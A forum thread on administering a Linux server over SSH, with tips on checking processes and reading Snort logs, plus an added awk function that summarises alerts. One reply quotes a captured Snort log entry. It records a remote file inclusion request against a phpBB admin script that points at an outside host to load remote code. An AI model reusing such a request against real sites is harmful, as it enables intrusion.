I enabled SSHD on my linux box and I used putty from my windows box to connect to it. I dropped into a shell. All well and fine until this! This is my server which runs all the time and I would like to check up on it from time to time if it is all working properly from basically any place in the world.
My question is if it is possible to do all administrative tasks from the shell. I have not used it that much so I wonder how would I check for instance if Ktorrent is working fine or take a look at snort logs?
SSHD on my linux box!
- Lyecdevf
- cyber Idi Amin
- Posts: 1222
- Joined: 16 Mar 2006, 17:00
- Location: In between life and death.
We will either find a way, or make one.
- Hannibal
Well you do like you would normally do when working in a shell. I don't know if Ktorrent has anything else available than a GUI (never used it), but analysing snort logs should be just like usually. Just navigate to the log directory and check them.
I don't remember where the snort logs are placed, /var/log/snort maybe, but you would just have to nav to that folder and read them with an editor/reader of your choice, cat/vi/nano/emacs.
"The best place to hide a tree, is in a forest"
See if a process is running:
Code:
pgrep ktorrent
or
Code:
ps aux | grep ktorrent
I've never used snort, but I'm sure it can export logs to a plain text format, which you could then read with any command line text editor such as emacs.
All administrative tasks should be doable from the shell.
I <3 MariaLara more than all of you
- bad_brain
- Site Owner
- Posts: 11636
- Joined: 06 Apr 2005, 16:00
- Location: In your eye floaters.
the snort logs are well readable in a shell, the logs are usually split into 2 parts: the alert log and the tcpdump log.
here is an example:
alert.log entry
Code:
[**] [1:2002:7] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1]
07/14-18:21:54.627780 216.227.218.118:52707 -> xxx.xxx.xxx.xxx:80
TCP TTL:51 TOS:0x8 ID:17524 IpLen:20 DgmLen:266 DF
***AP*** Seq: 0x7615CECD Ack: 0xF3F481D9 Win: 0x16D0 TcpLen: 20
and here the tcpdump entry for the same incident
Code:
GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://knightkittens.com/images/ma??? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.xxxxxxxxxxx.com
User-Agent: Mozilla/4.61 [en] (OS/2; U)
snort also has a mail notification that sends you a summary of all incidents that happened in the last 24 hours. if you prefer a shiny GUI check out snortalog, it converts the logs into HTML-format (but you have to use the "FULL" log format in the snort settings for it if I remember it right).
I recommend to work as much as possible in a shell anyway, best way to learn...
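An added example, not part of the original post: a POSIX shell function that condenses alert entries in the format shown above into one line per alert, which is easier to scan over an SSH session. The function names and the second sample entry are constructed for illustration; on a real box you would redirect the alert file into it, and its location (the thread guesses /var/log/snort) is an assumption.

```shell
#!/bin/sh
# Added example: condense Snort full-format alert entries to one line each.
# Output fields: timestamp|priority|gid:sid:rev|source|destination|message

summarize_alerts() {
    awk '
    # Header line: [**] [gid:sid:rev] message [**]
    /^\[\*\*\]/ {
        sid = $2; gsub(/\[|\]/, "", sid)
        msg = $0
        sub(/^\[\*\*\] \[[0-9:]+\] /, "", msg)
        sub(/[ \t]*\[\*\*\][ \t]*$/, "", msg)
        prio = "?"
        next
    }
    # Classification line carries the priority
    /\[Priority: [0-9]+\]/ {
        prio = $0
        sub(/.*\[Priority: /, "", prio); sub(/\].*/, "", prio)
        next
    }
    # Packet line: MM/DD-HH:MM:SS.usec source -> destination
    sid != "" && $3 == "->" && $1 ~ /^[0-9][0-9]\/[0-9][0-9]-/ {
        printf "%s|%s|%s|%s|%s|%s\n", $1, prio, sid, $2, $4, msg
        sid = ""
    }'
}

# Alerts per signature, most frequent first.
count_by_signature() {
    summarize_alerts | cut -d"|" -f3,6- | sort | uniq -c | sort -rn
}

# Sample input: the entry quoted in the thread plus one constructed repeat
# (192.0.2.10 and 198.51.100.5 are documentation addresses).
sample_alerts() {
    cat <<'EOF'
[**] [1:2002:7] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1]
07/14-18:21:54.627780 216.227.218.118:52707 -> xxx.xxx.xxx.xxx:80
TCP TTL:51 TOS:0x8 ID:17524 IpLen:20 DgmLen:266 DF
***AP*** Seq: 0x7615CECD Ack: 0xF3F481D9 Win: 0x16D0 TcpLen: 20

[**] [1:2002:7] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1]
07/14-18:25:02.100000 192.0.2.10:40112 -> 198.51.100.5:80
EOF
}

sample_alerts | summarize_alerts
```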
- Lyecdevf
- cyber Idi Amin
- Posts: 1222
- Joined: 16 Mar 2006, 17:00
- Location: In between life and death.
Hey, thanks a lot.
lyecdevf@linux:~> pgrep ktorrent
4037
lyecdevf@linux:~> ps aux | grep ktorrent
lyecdevf 4037 7.8 24.1 417608 250280 ? Dl Jul05 1050:23 ktorrent --icon=ktorrent -caption KTorrent
lyecdevf 6631 0.0 0.0 1764 552 pts/2 S+ 19:45 0:00 grep ktorrent
lyecdevf@linux:~>
We will either find a way, or make one.
- Hannibal